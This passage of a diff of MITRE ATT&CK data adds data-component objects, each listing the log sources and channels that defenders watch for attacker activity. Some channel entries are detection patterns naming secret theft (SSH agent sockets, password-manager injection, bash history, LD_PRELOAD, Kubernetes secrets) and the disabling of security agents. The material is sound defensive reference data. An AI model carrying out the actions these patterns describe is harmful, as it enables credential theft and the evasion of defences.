+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "provider: ETW CreateProcess events linking msbuild.exe to suspicious children where standard logs are incomplete"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "shutdown -h now or reboot"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Execution of Code.app, idea, JetBrainsToolbox, eclipse with install/extension flags"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process execution events for system discovery utilities (system_profiler, sysctl, networksetup, ioreg) with parameter analysis"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for process execution and system call monitoring during reconnaissance"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "host daemon events related to VM operations and configuration queries during reconnaissance"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMware kernel events for hardware and system configuration access during environmental validation"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "processes modifying environment variables related to history logging"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: parent process is usb/hid device handler, child process bash/python invoked"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "execution of curl, rclone, or Office apps invoking network sessions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec: Execution of kextstat, kextfind, or ioreg targeting driver information"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "exec events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process creation involving binaries interacting with resource fork data"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process event"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve: Execution of suspicious exploit binaries targeting security daemons"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "execve: Unsigned or unnotarized processes launched with high privileges"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "security OR injection attempts into 1Password OR LastPass"
+                        },
+                        {
+                            "name": "AndroidLogs:Kernel",
+                            "channel": "init or zygote process executing scripts or binaries from non-standard data or sdcard locations during early boot"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "launchd invocation of binary from non-Apple, non-AppStore, or sideloaded location during boot or shortly after unlock"
+                        },
+                        {
+                            "name": "AndroidLogs:Framework",
+                            "channel": "Creation of a new process running as system or root UID whose executable path resides under an app container path (for example, /data/app or /data/user/0/<pkg>), or whose parent process originates from an app sandbox"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Creation of a new process with elevated UID or sensitive entitlements whose binary path is associated with an app container or whose parent/caller is a low-privileged app/webcontent process"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "dlopen of a recently created .so OR short-lived child (/system/bin/sh,toybox,linker) spawned by app_process"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "startActivity on top of <target_pkg> (launchMode/singleTop), task switch immediately after focus"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "unexpected spikes in fork/exec/app process start events for helper utilities used for enumeration (ps, toybox/toolbox variants) from same UID"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes audio buffer or recorded audio file into application storage directories"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser or WebView-hosting application brought to foreground and navigates to external content, followed by abnormal state transition, crash, restart, or process spawn behavior"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application installed from adb, sideload, or unknown USB source"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application invokes Runtime.exec, ProcessBuilder, JNI-backed command launcher, or equivalent command-execution bridge immediately before shell or command process creation"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app invokes lower-level OS process-launch or command-execution behavior before file or network effects, including interpreter-like execution flow where visible to sensor"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application execution triggered with unexpected parent context or via indirect invocation (intent redirection or component hijack)"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.773000+00:00\", \"old_value\": \"2026-04-13 15:49:16.424000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0032\", \"old_value\": \"https://attack.mitre.org/data-components/DC0032\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0034",
+                            "external_id": "DC0034"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Process Metadata",
+                    "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Process",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.process"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "CodeIntegrity/WDAC events indicating unsigned/invalid DLL loads"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo or service accounts invoking loaders with suspicious env vars"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Process Context"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "user session"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Admin activity"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call for sudo where euid != uid"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.TCC"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec of binary with setuid/setgid and EUID != UID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Use of fork/exec with DISPLAY unset or redirected"
+                        },
+                        {
+                            "name": "EDR:Telemetry",
+                            "channel": "Process lineage and API usage enrichment (GetSystemTime, GetTimeZoneInformation, NtQuerySystemTime)"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "/var/log/hostd.log API calls reading/altering time/ntp settings"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve, prctl, or ptrace activity affecting process memory or command-line arguments"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Cross-reference argv[0] with actual executable path and parent process metadata"
+                        },
+                        {
+                            "name": "WinEventLog:AppLocker",
+                            "channel": "AppLocker audit/blocks showing developer utilities executing scripts/binaries outside policy"
+                        },
+                        {
+                            "name": "EDR:hunting",
+                            "channel": "Correlation of signer info, parent-child lineage, rare invocation context (user host role), and API surfaces (CreateProcess*, LoadLibrary*)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Security-Mitigations/KernelMode",
+                            "channel": "ETW telemetry indicating ClickOnce deployment (dfsvc.exe) launching payloads"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-ClickOnce",
+                            "channel": "provider: Event Tracing for Windows (ETW) events associated with ClickOnce deployment (dfsvc.exe activity)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Camera Frame Server/Operational",
+                            "channel": "Process session start/stop events for camera pipeline by unexpected executables"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "select: path LIKE '/dev/video%'"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "state=attached/debugged"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code Execution & Entitlement Access"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Process opening SSH_AUTH_SOCK or /tmp/ssh-* socket not owned by same UID"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "code signature/memory protection"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with UID \u2260 EUID"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve with escalated privileges"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "cross-account or unexpected assume role"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log collect from launchd and process start"
+                        },
+                        {
+                            "name": "containerd:events",
+                            "channel": "Docker or containerd image pulls and process executions"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Kernel or daemon warnings of downgraded TLS or cryptographic settings"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modifications or writes to EFI system partition for downgraded bootloaders"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "non-shell process tree accessing bash history"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process metadata mismatch between /proc and runtime attributes"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "process environment variables containing LD_PRELOAD"
+                        },
+                        {
+                            "name": "WinEventLog:PowerShell",
+                            "channel": "EventCode=400, 403"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Process Execution + Hash"
+                        },
+                        {
+                            "name": "etw:Microsoft-Windows-Kernel-Process",
+                            "channel": "process_start: EventHeader.ProcessId true parent vs reported PPID mismatch"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_MMAP"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned/invalid signature modules or images loaded by msbuild.exe or its children"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-DeviceGuard/Operational",
+                            "channel": "WDAC policy audit/block affecting msbuild.exe spawned payloads"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-SmartAppControl/Operational",
+                            "channel": "Smart App Control decisions (audit/block) for msbuild.exe-launched executables"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned or untrusted modules loaded during JamPlus.exe runtime"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Crash or abnormal termination of security agent or system extension host"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "mobile-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-16 17:01:33.771000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0001",
+                            "external_id": "DC0001"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Scheduled Job Creation",
+                    "description": "The establishment of a task or job that will execute at a predefined time or based on specific triggers.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Scheduled Job",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4698"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Execution of non-standard script or binary by cron"
+                        },
+                        {
+                            "name": "WinEventLog:TaskScheduler",
+                            "channel": "EventCode=106"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "crontab, systemd_timers"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd_jobs"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Startup script and task execution logs"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "verb=create, resource=cronjobs, group=batch"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "process: crontab edits, launch of cron job"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events - cron, launchd"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "execution of scheduled job"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "task creation events"
+                        },
+                        {
+                            "name": "macos:cron",
+                            "channel": "cron/launchd"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4699"
+                        },
+                        {
+                            "name": "linux:cron",
+                            "channel": "Scheduled execution of unknown or unusual script/binary"
+                        },
+                        {
+                            "name": "MobiledEDR:telemetry",
+                            "channel": "Scheduled task execution creates cache, staged payload, local output, or collected data artifact immediately after wake or job trigger"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-09 17:05:23.355000+00:00\"}, \"root['external_references'][0]['url']\": {\"new_value\": \"https://attack.mitre.org/datacomponents/DC0001\", \"old_value\": \"https://attack.mitre.org/data-components/DC0001\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0041",
+                            "external_id": "DC0041"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Service Metadata",
+                    "description": "Contextual data about a service/daemon, which may include information such as name, service executable, start type, etc.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Service",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=4"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "service stopped messages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "launchctl disable or bootout calls"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Stop VM or disable service events via vim-cmd"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "auditd service stopped or disabled"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "launchd"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "scheduled/real-time"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.launchservices"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "registers services with legitimate-sounding names"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=7035"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Service restart with modified executable path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Observed loading of new LaunchAgent or LaunchDaemon plist"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "seccomp or AppArmor profile changes"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Service stopped or RecoveryDisabled set via REAgentC"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Service events"
+                        },
+                        {
+                            "name": "WinEventLog:WinRM",
+                            "channel": "EventCode=6"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "delete: Modification of systemd unit files or config for security agents"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of system configuration profiles affecting security tools"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "kubectl delete or patch of security pods/admission controllers"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "write: Startup configuration changes disabling security checks"
+                        },
+                        {
+                            "name": "auditd:DAEMON",
+                            "channel": "auditd stopped, config changed, logging suspended"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-16 16:59:19.254000+00:00\"}}}",
+                    "previous_version": "2.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0065",
+                            "external_id": "DC0065"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Service Modification",
+                    "description": "Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "service state change"
+                        },
+                        {
+                            "name": "Service",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-IIS-Configuration",
+                            "channel": "Module or ISAPI filter registration events"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "EventCode=7040"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-20 18:21:23.994000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.271000+00:00",
+                    "modified": "2026-05-12 15:12:00.777000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0002",
+                            "external_id": "DC0002"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "User Account Authentication",
+                    "description": "An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "auditd:AUTH",
+                            "channel": "pam_unix or pam_google_authenticator invoked repeatedly within short interval"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "pam_authenticate, sshd"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execution of ssh, scp, or sftp using previously unseen credentials or keys"
+                        },
+                        {
+                            "name": "auditd:USER_LOGIN",
+                            "channel": "USER_AUTH"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRole or ConsoleLogin with repeated MFA failures followed by repeated MFA requests"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "sts:GetFederationToken"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AssumeRoleWithWebIdentity"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "AWS IAM: ListUsers, ListRoles"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "eventName=ConsoleLogin | eventType=AwsConsoleSignIn"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ConsoleLogin or AssumeRole"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "ConsoleLogin, AssumeRole, ListAccessKeys, CreateUser"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Success logs from high-risk accounts"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Multiple MFA challenge requests without successful primary login"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "TokenIssued, TokenRenewed: Unexpected or anomalous token issuance events"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "SignIn: Sign-ins flagged as atypical (new geographic region, unfamiliar device id) shortly after correlated endpoint/browser compromise times"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Operation=UserLogin"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Unusual Token Usage or Application Consent"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "OperationName=SetDomainAuthentication OR Set-FederatedDomain"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in with unfamiliar location/device + portal navigation"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Login from newly created account"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Interactive/Non-Interactive Sign-In"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Reset password or download key from portal"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "status = failure"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in logs"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "SigninSuccess"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Failure Reason + UserPrincipalName"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in activity"
+                        },
+                        {
+                            "name": "azure:signinlogs",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "interactive shell or SSH access preceding storage enumeration"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "/var/log/auth.log"
+                        },
+                        {
+                            "name": "esxi:auth",
+                            "channel": "SSH session/login"
+                        },
+                        {
+                            "name": "esxi:vpxa",
+                            "channel": "user login from unexpected IP or non-admin user role"
+                        },
+                        {
+                            "name": "esxi:vpxd",
+                            "channel": "/var/log/vmware/vpxd.log"
+                        },
+                        {
+                            "name": "ESXiLogs:authlog",
+                            "channel": "Unexpected login followed by encoding commands"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "drive.activity"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "login.event"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "Sign-in logs / audit events"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "Token Generation via Domain Delegation"
+                        },
+                        {
+                            "name": "GCPAuditLogs:login.googleapis.com",
+                            "channel": "Failed sign-in events"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "get/list requests to /api/v1/secrets or /api/v1/namespaces/*/serviceaccounts"
+                        },
+                        {
+                            "name": "kubernetes:apiserver",
+                            "channel": "authentication.k8s.io/v1beta1"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "Failed login"
+                        },
+                        {
+                            "name": "kubernetes:audit",
+                            "channel": "authentication.k8s.io"
+                        },
+                        {
+                            "name": "linux:auth",
+                            "channel": "sshd login"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sudo/date/timedatectl execution by non-standard users"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "SSH failed login"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Failed password for invalid user"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "sshd[pid]: Failed password"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "authentication and authorization events during environmental validation phase"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "Logon failure"
+                        },
+                        {
+                            "name": "m365:exchange",
+                            "channel": "FailedLogin"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "Sign-in from anomalous location or impossible travel condition"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "UserLoginSuccess"
+                        },
+                        {
+                            "name": "m365:signinlogs",
+                            "channel": "Unusual sign-in from service principal to user mailbox"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Delegated permission grants without user login event"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "login using refresh_token with no preceding authentication context"
+                        },
+                        {
+                            "name": "m365:unified",
+                            "channel": "Sign-in logs"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "successful sudo or authentication for account not normally associated with admin actions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login success without MFA step"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "log show --predicate 'eventMessage contains \"Authentication\"'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "User credential prompt events without associated trusted installer package"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login failure / authorization denied"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "auth"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Login Window and Authd errors"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "authd"
+                        },
+                        {
+                            "name": "network:auth",
+                            "channel": "repeated successful authentications with previously unknown accounts or anomalous password acceptance"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config access, authentication logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "User privilege escalation to level 15/root prior to destructive commands"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authorization/accounting logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Failed and successful logins to network devices outside approved admin IP ranges"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privileged login followed by destructive format command"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "admin login events"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Privileged login followed by destructive command sequence"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "AAA, RADIUS, or TACACS authentication"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authentication logs"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "AAA or TACACS authentication failures"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "authentication & authorization"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "login failed"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Accepted password or publickey for user from remote IP"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Repeated failed authentication attempts or replay patterns"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "Successful login without expected MFA challenge"
+                        },
+                        {
+                            "name": "NSM:Connections",
+                            "channel": "sshd or PAM logins"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "TGS-REQ and AS-REQ seen for new user shortly after domain-modifying process"
+                        },
+                        {
+                            "name": "Okta:authn",
+                            "channel": "authentication_failure"
+                        },
+                        {
+                            "name": "Okta:SystemLog",
+                            "channel": "eventType: user.authentication.sso, app.oauth2.token.grant"
+                        },
+                        {
+                            "name": "saas-app:auth",
+                            "channel": "login_failure"
+                        },
+                        {
+                            "name": "saas:audit",
